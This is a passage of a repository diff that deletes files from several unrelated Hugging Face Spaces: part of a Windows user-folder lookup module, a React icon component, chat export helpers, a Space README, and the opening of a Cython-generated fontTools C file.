CSIDL name: {csidl_name}" - raise ValueError(msg) - - buf = ctypes.create_unicode_buffer(1024) - windll = getattr(ctypes, "windll") # noqa: B009 # using getattr to avoid false positive with mypy type checker - windll.shell32.SHGetFolderPathW(None, csidl_const, None, 0, buf) - - # Downgrade to short path name if it has highbit chars. - if any(ord(c) > 255 for c in buf): # noqa: PLR2004 - buf2 = ctypes.create_unicode_buffer(1024) - if windll.kernel32.GetShortPathNameW(buf.value, buf2, 1024): - buf = buf2 - - if csidl_name == "CSIDL_DOWNLOADS": - return os.path.join(buf.value, "Downloads") # noqa: PTH118 - - return buf.value - - -def _pick_get_win_folder() -> Callable[[str], str]: - if hasattr(ctypes, "windll"): - return get_win_folder_via_ctypes - try: - import winreg # noqa: F401 - except ImportError: - return get_win_folder_from_env_vars - else: - return get_win_folder_from_registry - - -get_win_folder = lru_cache(maxsize=None)(_pick_get_win_folder()) - -__all__ = [ - "Windows", -] diff --git a/spaces/plzdontcry/dakubettergpt/src/assets/icons/ImageIcon.tsx b/spaces/plzdontcry/dakubettergpt/src/assets/icons/ImageIcon.tsx deleted file mode 100644 index d33ac2d58f2a91d1039570b29a75f7e59c816676..0000000000000000000000000000000000000000 --- a/spaces/plzdontcry/dakubettergpt/src/assets/icons/ImageIcon.tsx +++ /dev/null @@ -1,17 +0,0 @@ -import React from 'react'; - -const ImageIcon = (props: React.SVGProps) => { - return ( - - - - ); -}; - -export default ImageIcon; diff --git a/spaces/plzdontcry/dakubettergpt/src/utils/chat.ts b/spaces/plzdontcry/dakubettergpt/src/utils/chat.ts deleted file mode 100644 index 8c06726435779424eb4d95f74e1b657d5f1b3745..0000000000000000000000000000000000000000 --- a/spaces/plzdontcry/dakubettergpt/src/utils/chat.ts +++ /dev/null @@ -1,43 +0,0 @@ -import html2canvas from 'html2canvas'; -import { ChatInterface } from '@type/chat'; - -// Function to convert HTML to an image using html2canvas -export const htmlToImg = async (html: HTMLDivElement) => { - const needResize = window.innerWidth >= 1024; - const initialWidth = html.style.width; - if (needResize) { - html.style.width = '1023px'; - } - const canvas = await html2canvas(html); - if (needResize) html.style.width = initialWidth; - const dataURL = canvas.toDataURL('image/png'); - return dataURL; -}; - -// Function to download the image as a file -export const downloadImg = (imgData: string, fileName: string) => { - const link = document.createElement('a'); - link.href = imgData; - link.download = fileName; - link.click(); - link.remove(); -}; - -// Function to convert a chat object to markdown format -export const chatToMarkdown = (chat: ChatInterface) => { - let markdown = `# ${chat.title}\n\n`; - chat.messages.forEach((message) => { - markdown += `### **${message.role}**:\n\n${message.content}\n\n---\n\n`; - }); - return markdown; -}; - -// Function to download the markdown content as a file -export const downloadMarkdown = (markdown: string, fileName: string) => { - const link = document.createElement('a'); - const markdownFile = new Blob([markdown], { type: 'text/markdown' }); - link.href = URL.createObjectURL(markdownFile); - link.download = fileName; - link.click(); - link.remove(); -}; diff --git a/spaces/pngwn/music-visualizer/README.md b/spaces/pngwn/music-visualizer/README.md deleted file mode 100644 index 34e4ade059acee4bb6e441e3baad6829310f70d8..0000000000000000000000000000000000000000 --- a/spaces/pngwn/music-visualizer/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Music Visualizer -emoji: 🐨 -colorFrom: gray -colorTo: indigo -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false -duplicated_from: nateraw/music-visualizer ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/misc/bezierTools.c b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/misc/bezierTools.c deleted file mode 100644 index 9e5d3d79a4f0656e624f40c6f07908d5c08d933b..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/misc/bezierTools.c +++ /dev/null @@ -1,40443 +0,0 @@ -/* Generated by Cython 3.0.3 */ - -/* BEGIN: Cython Metadata -{ - "distutils": { - "name": "fontTools.misc.bezierTools", - "sources": [ - "Lib/fontTools/misc/bezierTools.py" - ] - }, - "module_name": "fontTools.misc.bezierTools" -} -END: Cython Metadata */ - -#ifndef PY_SSIZE_T_CLEAN -#define PY_SSIZE_T_CLEAN -#endif /* PY_SSIZE_T_CLEAN */ -#if defined(CYTHON_LIMITED_API) && 0 - #ifndef Py_LIMITED_API - #if CYTHON_LIMITED_API+0 > 0x03030000 - #define Py_LIMITED_API CYTHON_LIMITED_API - #else - #define Py_LIMITED_API 0x03030000 - #endif - #endif -#endif - -#include "Python.h" -#ifndef Py_PYTHON_H - #error Python headers needed to compile C extensions, please install development version of Python. -#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) - #error Cython requires Python 2.7+ or Python 3.3+. -#else -#if CYTHON_LIMITED_API -#define __PYX_EXTRA_ABI_MODULE_NAME "limited" -#else -#define __PYX_EXTRA_ABI_MODULE_NAME "" -#endif -#define CYTHON_ABI "3_0_3" __PYX_EXTRA_ABI_MODULE_NAME -#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI -#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." -#define CYTHON_HEX_VERSION 0x030003F0 -#define CYTHON_FUTURE_DIVISION 1 -#include -#ifndef offsetof - #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) -#endif -#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) - #ifndef __stdcall - #define __stdcall - #endif - #ifndef __cdecl - #define __cdecl - #endif - #ifndef __fastcall - #define __fastcall - #endif -#endif -#ifndef DL_IMPORT - #define DL_IMPORT(t) t -#endif -#ifndef DL_EXPORT - #define DL_EXPORT(t) t -#endif -#define __PYX_COMMA , -#ifndef HAVE_LONG_LONG - #define HAVE_LONG_LONG -#endif -#ifndef PY_LONG_LONG - #define PY_LONG_LONG LONG_LONG -#endif -#ifndef Py_HUGE_VAL - #define Py_HUGE_VAL HUGE_VAL -#endif -#define __PYX_LIMITED_VERSION_HEX PY_VERSION_HEX -#if defined(GRAALVM_PYTHON) - /* For very preliminary testing purposes. Most variables are set the same as PyPy. - The existence of this section does not imply that anything works or is even tested */ - #define CYTHON_COMPILING_IN_PYPY 0 - #define CYTHON_COMPILING_IN_CPYTHON 0 - #define CYTHON_COMPILING_IN_LIMITED_API 0 - #define CYTHON_COMPILING_IN_GRAAL 1 - #define CYTHON_COMPILING_IN_NOGIL 0 - #undef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 0 - #undef CYTHON_USE_TYPE_SPECS - #define CYTHON_USE_TYPE_SPECS 0 - #undef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 0 - #if PY_VERSION_HEX < 0x03050000 - #undef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 0 - #elif !defined(CYTHON_USE_ASYNC_SLOTS) - #define CYTHON_USE_ASYNC_SLOTS 1 - #endif - #undef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 0 - #undef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 0 - #undef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #undef CYTHON_USE_PYLONG_INTERNALS - #define CYTHON_USE_PYLONG_INTERNALS 0 - #undef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 1 - #undef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 0 - #undef CYTHON_UNPACK_METHODS - #define CYTHON_UNPACK_METHODS 0 - #undef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 0 - #undef CYTHON_FAST_GIL - #define CYTHON_FAST_GIL 0 - #undef CYTHON_METH_FASTCALL - #define CYTHON_METH_FASTCALL 0 - #undef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 0 - #ifndef CYTHON_PEP487_INIT_SUBCLASS - #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) - #endif - #undef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 1 - #undef CYTHON_USE_MODULE_STATE - #define CYTHON_USE_MODULE_STATE 0 - #undef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE 0 - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 - #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC - #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 - #endif -#elif defined(PYPY_VERSION) - #define CYTHON_COMPILING_IN_PYPY 1 - #define CYTHON_COMPILING_IN_CPYTHON 0 - #define CYTHON_COMPILING_IN_LIMITED_API 0 - #define CYTHON_COMPILING_IN_GRAAL 0 - #define CYTHON_COMPILING_IN_NOGIL 0 - #undef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 0 - #ifndef CYTHON_USE_TYPE_SPECS - #define CYTHON_USE_TYPE_SPECS 0 - #endif - #undef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 0 - #if PY_VERSION_HEX < 0x03050000 - #undef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 0 - #elif !defined(CYTHON_USE_ASYNC_SLOTS) - #define CYTHON_USE_ASYNC_SLOTS 1 - #endif - #undef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 0 - #undef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 0 - #undef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #undef CYTHON_USE_PYLONG_INTERNALS - #define CYTHON_USE_PYLONG_INTERNALS 0 - #undef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 1 - #undef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 0 - #undef CYTHON_UNPACK_METHODS - #define CYTHON_UNPACK_METHODS 0 - #undef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 0 - #undef CYTHON_FAST_GIL - #define CYTHON_FAST_GIL 0 - #undef CYTHON_METH_FASTCALL - #define CYTHON_METH_FASTCALL 0 - #undef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 0 - #ifndef CYTHON_PEP487_INIT_SUBCLASS - #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) - #endif - #if PY_VERSION_HEX < 0x03090000 - #undef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 0 - #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) - #define CYTHON_PEP489_MULTI_PHASE_INIT 1 - #endif - #undef CYTHON_USE_MODULE_STATE - #define CYTHON_USE_MODULE_STATE 0 - #undef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 - #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC - #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 - #endif -#elif defined(CYTHON_LIMITED_API) - #ifdef Py_LIMITED_API - #undef __PYX_LIMITED_VERSION_HEX - #define __PYX_LIMITED_VERSION_HEX Py_LIMITED_API - #endif - #define CYTHON_COMPILING_IN_PYPY 0 - #define CYTHON_COMPILING_IN_CPYTHON 0 - #define CYTHON_COMPILING_IN_LIMITED_API 1 - #define CYTHON_COMPILING_IN_GRAAL 0 - #define CYTHON_COMPILING_IN_NOGIL 0 - #undef CYTHON_CLINE_IN_TRACEBACK - #define CYTHON_CLINE_IN_TRACEBACK 0 - #undef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 0 - #undef CYTHON_USE_TYPE_SPECS - #define CYTHON_USE_TYPE_SPECS 1 - #undef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 0 - #undef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 0 - #undef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 0 - #undef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 0 - #ifndef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #endif - #undef CYTHON_USE_PYLONG_INTERNALS - #define CYTHON_USE_PYLONG_INTERNALS 0 - #ifndef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 0 - #endif - #undef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 0 - #undef CYTHON_UNPACK_METHODS - #define CYTHON_UNPACK_METHODS 0 - #undef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 0 - #undef CYTHON_FAST_GIL - #define CYTHON_FAST_GIL 0 - #undef CYTHON_METH_FASTCALL - #define CYTHON_METH_FASTCALL 0 - #undef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 0 - #ifndef CYTHON_PEP487_INIT_SUBCLASS - #define CYTHON_PEP487_INIT_SUBCLASS 1 - #endif - #undef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 0 - #undef CYTHON_USE_MODULE_STATE - #define CYTHON_USE_MODULE_STATE 1 - #ifndef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE 0 - #endif - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 - #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC - #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 - #endif -#elif defined(PY_NOGIL) - #define CYTHON_COMPILING_IN_PYPY 0 - #define CYTHON_COMPILING_IN_CPYTHON 0 - #define CYTHON_COMPILING_IN_LIMITED_API 0 - #define CYTHON_COMPILING_IN_GRAAL 0 - #define CYTHON_COMPILING_IN_NOGIL 1 - #ifndef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 1 - #endif - #undef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 0 - #ifndef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 1 - #endif - #undef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 0 - #ifndef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 1 - #endif - #undef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #undef CYTHON_USE_PYLONG_INTERNALS - #define CYTHON_USE_PYLONG_INTERNALS 0 - #ifndef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 0 - #endif - #ifndef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 1 - #endif - #ifndef CYTHON_UNPACK_METHODS - #define CYTHON_UNPACK_METHODS 1 - #endif - #undef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 0 - #undef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 0 - #ifndef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 1 - #endif - #ifndef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE 1 - #endif - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 -#else - #define CYTHON_COMPILING_IN_PYPY 0 - #define CYTHON_COMPILING_IN_CPYTHON 1 - #define CYTHON_COMPILING_IN_LIMITED_API 0 - #define CYTHON_COMPILING_IN_GRAAL 0 - #define CYTHON_COMPILING_IN_NOGIL 0 - #ifndef CYTHON_USE_TYPE_SLOTS - #define CYTHON_USE_TYPE_SLOTS 1 - #endif - #ifndef CYTHON_USE_TYPE_SPECS - #define CYTHON_USE_TYPE_SPECS 0 - #endif - #ifndef CYTHON_USE_PYTYPE_LOOKUP - #define CYTHON_USE_PYTYPE_LOOKUP 1 - #endif - #if PY_MAJOR_VERSION < 3 - #undef CYTHON_USE_ASYNC_SLOTS - #define CYTHON_USE_ASYNC_SLOTS 0 - #elif !defined(CYTHON_USE_ASYNC_SLOTS) - #define CYTHON_USE_ASYNC_SLOTS 1 - #endif - #ifndef CYTHON_USE_PYLONG_INTERNALS - #define CYTHON_USE_PYLONG_INTERNALS 1 - #endif - #ifndef CYTHON_USE_PYLIST_INTERNALS - #define CYTHON_USE_PYLIST_INTERNALS 1 - #endif - #ifndef CYTHON_USE_UNICODE_INTERNALS - #define CYTHON_USE_UNICODE_INTERNALS 1 - #endif - #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 - #undef CYTHON_USE_UNICODE_WRITER - #define CYTHON_USE_UNICODE_WRITER 0 - #elif !defined(CYTHON_USE_UNICODE_WRITER) - #define CYTHON_USE_UNICODE_WRITER 1 - #endif - #ifndef CYTHON_AVOID_BORROWED_REFS - #define CYTHON_AVOID_BORROWED_REFS 0 - #endif - #ifndef CYTHON_ASSUME_SAFE_MACROS - #define CYTHON_ASSUME_SAFE_MACROS 1 - #endif - #ifndef CYTHON_UNPACK_METHODS - #define CYTHON_UNPACK_METHODS 1 - #endif - #ifndef CYTHON_FAST_THREAD_STATE - #define CYTHON_FAST_THREAD_STATE 1 - #endif - #ifndef CYTHON_FAST_GIL - #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) - #endif - #ifndef CYTHON_METH_FASTCALL - #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) - #endif - #ifndef CYTHON_FAST_PYCALL - #define CYTHON_FAST_PYCALL 1 - #endif - #ifndef CYTHON_PEP487_INIT_SUBCLASS - #define CYTHON_PEP487_INIT_SUBCLASS 1 - #endif - #if PY_VERSION_HEX < 0x03050000 - #undef CYTHON_PEP489_MULTI_PHASE_INIT - #define CYTHON_PEP489_MULTI_PHASE_INIT 0 - #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) - #define CYTHON_PEP489_MULTI_PHASE_INIT 1 - #endif - #ifndef CYTHON_USE_MODULE_STATE - #define CYTHON_USE_MODULE_STATE 0 - #endif - #if PY_VERSION_HEX < 0x030400a1 - #undef CYTHON_USE_TP_FINALIZE - #define CYTHON_USE_TP_FINALIZE 0 - #elif !defined(CYTHON_USE_TP_FINALIZE) - #define CYTHON_USE_TP_FINALIZE 1 - #endif - #if PY_VERSION_HEX < 0x030600B1 - #undef CYTHON_USE_DICT_VERSIONS - #define CYTHON_USE_DICT_VERSIONS 0 - #elif !defined(CYTHON_USE_DICT_VERSIONS) - #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) - #endif - #if PY_VERSION_HEX < 0x030700A3 - #undef CYTHON_USE_EXC_INFO_STACK - #define CYTHON_USE_EXC_INFO_STACK 0 - #elif !defined(CYTHON_USE_EXC_INFO_STACK) - #define CYTHON_USE_EXC_INFO_STACK 1 - #endif - #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC - #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 - #endif -#endif -#if !defined(CYTHON_FAST_PYCCALL) -#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) -#endif -#if !defined(CYTHON_VECTORCALL) -#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) -#endif -#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) -#if CYTHON_USE_PYLONG_INTERNALS - #if PY_MAJOR_VERSION < 3 - #include "longintrepr.h" - #endif - #undef SHIFT - #undef BASE - #undef MASK - #ifdef SIZEOF_VOID_P - enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; - #endif -#endif -#ifndef __has_attribute - #define __has_attribute(x) 0 -#endif -#ifndef __has_cpp_attribute - #define __has_cpp_attribute(x) 0 -#endif -#ifndef CYTHON_RESTRICT - #if defined(__GNUC__) - #define CYTHON_RESTRICT __restrict__ - #elif defined(_MSC_VER) && _MSC_VER >= 1400 - #define CYTHON_RESTRICT __restrict - #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L - #define CYTHON_RESTRICT restrict - #else - #define CYTHON_RESTRICT - #endif -#endif -#ifndef CYTHON_UNUSED - #if defined(__cplusplus) - /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 - * but leads to warnings with -pedantic, since it is a C++17 feature */ - #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) - #if __has_cpp_attribute(maybe_unused) - #define CYTHON_UNUSED [[maybe_unused]] - #endif - #endif - #endif -#endif -#ifndef CYTHON_UNUSED -# if defined(__GNUC__) -# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) -# define CYTHON_UNUSED __attribute__ ((__unused__)) -# else -# define CYTHON_UNUSED -# endif -# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) -# define CYTHON_UNUSED __attribute__ ((__unused__)) -# else -# define CYTHON_UNUSED -# endif -#endif -#ifndef CYTHON_UNUSED_VAR -# if defined(__cplusplus) - template void CYTHON_UNUSED_VAR( const T& ) { } -# else -# define CYTHON_UNUSED_VAR(x) (void)(x) -# endif -#endif -#ifndef CYTHON_MAYBE_UNUSED_VAR - #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) -#endif -#ifndef CYTHON_NCP_UNUSED -# if CYTHON_COMPILING_IN_CPYTHON -# define CYTHON_NCP_UNUSED -# else -# define CYTHON_NCP_UNUSED CYTHON_UNUSED -# endif -#endif -#ifndef CYTHON_USE_CPP_STD_MOVE - #if defined(__cplusplus) && (\ - __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600)) - #define CYTHON_USE_CPP_STD_MOVE 1 - #else - #define CYTHON_USE_CPP_STD_MOVE 0 - #endif -#endif -#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) -#ifdef _MSC_VER - #ifndef _MSC_STDINT_H_ - #if _MSC_VER < 1300 - typedef unsigned char uint8_t; - typedef unsigned short uint16_t; - typedef unsigned int uint32_t; - #else - typedef unsigned __int8 uint8_t; - typedef unsigned __int16 uint16_t; - typedef unsigned __int32 uint32_t; - #endif - #endif - #if _MSC_VER < 1300 - #ifdef _WIN64 - typedef unsigned long long __pyx_uintptr_t; - #else - typedef unsigned int __pyx_uintptr_t; - #endif - #else - #ifdef _WIN64 - typedef unsigned __int64 __pyx_uintptr_t; - #else - typedef unsigned __int32 __pyx_uintptr_t; - #endif - #endif -#else - #include - typedef uintptr_t __pyx_uintptr_t; -#endif -#ifndef CYTHON_FALLTHROUGH - #if defined(__cplusplus) - /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 - * but leads to warnings with -pedantic, since it is a C++17 feature */ - #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) - #if __has_cpp_attribute(fallthrough) - #define CYTHON_FALLTHROUGH [[fallthrough]] - #endif - #endif - #ifndef CYTHON_FALLTHROUGH - #if __has_cpp_attribute(clang::fallthrough) - #define CYTHON_FALLTHROUGH [[clang::fallthrough]] - #elif __has_cpp_attribute(gnu::fallthrough) - #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] - #endif - #endif - #endif - #ifndef CYTHON_FALLTHROUGH - #if __has_attribute(fallthrough) - #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) - #else - #define CYTHON_FALLTHROUGH - #endif - #endif - #if defined(__clang__) && defined(__apple_build_version__) - #if __apple_build_version__ < 7000000 - #undef CYTHON_FALLTHROUGH - #define CYTHON_FALLTHROUGH - #endif - #endif -#endif -#ifdef __cplusplus - template - struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; - #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) -#else - #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) -#endif -#if CYTHON_COMPILING_IN_PYPY == 1 - #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) -#else - #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) -#endif -#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) - -#ifndef CYTHON_INLINE - #if defined(__clang__) - #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) - #elif defined(__GNUC__) - #define CYTHON_INLINE __inline__ - #elif defined(_MSC_VER) - #define CYTHON_INLINE __inline - #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L - #define CYTHON_INLINE inline - #else - #define CYTHON_INLINE - #endif -#endif - -#define __PYX_BUILD_PY_SSIZE_T "n" -#define CYTHON_FORMAT_SSIZE_T "z" -#if PY_MAJOR_VERSION < 3 - #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" - #define __Pyx_DefaultClassType PyClass_Type - #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ - PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) -#else - #define __Pyx_BUILTIN_MODULE_NAME "builtins" - #define __Pyx_DefaultClassType PyType_Type -#if CYTHON_COMPILING_IN_LIMITED_API - static CYTHON_INLINE PyObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, - PyObject *code, PyObject *c, PyObject* n, PyObject *v, - PyObject *fv, PyObject *cell, PyObject* fn, - PyObject *name, int fline, PyObject *lnos) { - PyObject *exception_table = NULL; - PyObject *types_module=NULL, *code_type=NULL, *result=NULL; - #if __PYX_LIMITED_VERSION_HEX < 0x030B0000 - PyObject *version_info; // borrowed - #endif - PyObject *py_minor_version = NULL; - long minor_version = 0; - PyObject *type, *value, *traceback; - PyErr_Fetch(&type, &value, &traceback); - #if __PYX_LIMITED_VERSION_HEX >= 0x030B0000 - minor_version = 11; // we don't yet need to distinguish between versions > 11 - #else - if (!(version_info = PySys_GetObject("version_info"))) goto end; - if (!(py_minor_version = PySequence_GetItem(version_info, 1))) goto end; - minor_version = PyLong_AsLong(py_minor_version); - if (minor_version == -1 && PyErr_Occurred()) goto end; - #endif - if (!(types_module = PyImport_ImportModule("types"))) goto end; - if (!(code_type = PyObject_GetAttrString(types_module, "CodeType"))) goto end; - if (minor_version <= 7) { - (void)p; - result = PyObject_CallFunction(code_type, "iiiiiOOOOOOiOO", a, k, l, s, f, code, - c, n, v, fn, name, fline, lnos, fv, cell); - } else if (minor_version <= 10) { - result = PyObject_CallFunction(code_type, "iiiiiiOOOOOOiOO", a,p, k, l, s, f, code, - c, n, v, fn, name, fline, lnos, fv, cell); - } else { - if (!(exception_table = PyBytes_FromStringAndSize(NULL, 0))) goto end; - result = PyObject_CallFunction(code_type, "iiiiiiOOOOOOOiOO", a,p, k, l, s, f, code, - c, n, v, fn, name, name, fline, lnos, exception_table, fv, cell); - } - end: - Py_XDECREF(code_type); - Py_XDECREF(exception_table); - Py_XDECREF(types_module); - Py_XDECREF(py_minor_version); - if (type) { - PyErr_Restore(type, value, traceback); - } - return result; - } - #ifndef CO_OPTIMIZED - #define CO_OPTIMIZED 0x0001 - #endif - #ifndef CO_NEWLOCALS - #define CO_NEWLOCALS 0x0002 - #endif - #ifndef CO_VARARGS - #define CO_VARARGS 0x0004 - #endif - #ifndef CO_VARKEYWORDS - #define CO_VARKEYWORDS 0x0008 - #endif - #ifndef CO_ASYNC_GENERATOR - #define CO_ASYNC_GENERATOR 0x0200 - #endif - #ifndef CO_GENERATOR - #define CO_GENERATOR 0x0020 - #endif - #ifndef CO_COROUTINE - #define CO_COROUTINE 0x0080 - #endif -#elif PY_VERSION_HEX >= 0x030B0000 - static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, - PyObject *code, PyObject *c, PyObject* n, PyObject *v, - PyObject *fv, PyObject *cell, PyObject* fn, - PyObject *name, int fline, PyObject *lnos) { - PyCodeObject *result; - PyObject *empty_bytes = PyBytes_FromStringAndSize("", 0); // we don't have access to __pyx_empty_bytes here - if (!empty_bytes) return NULL; - result = - #if PY_VERSION_HEX >= 0x030C0000 - PyUnstable_Code_NewWithPosOnlyArgs - #else - PyCode_NewWithPosOnlyArgs - #endif - (a, p, k, l, s, f, 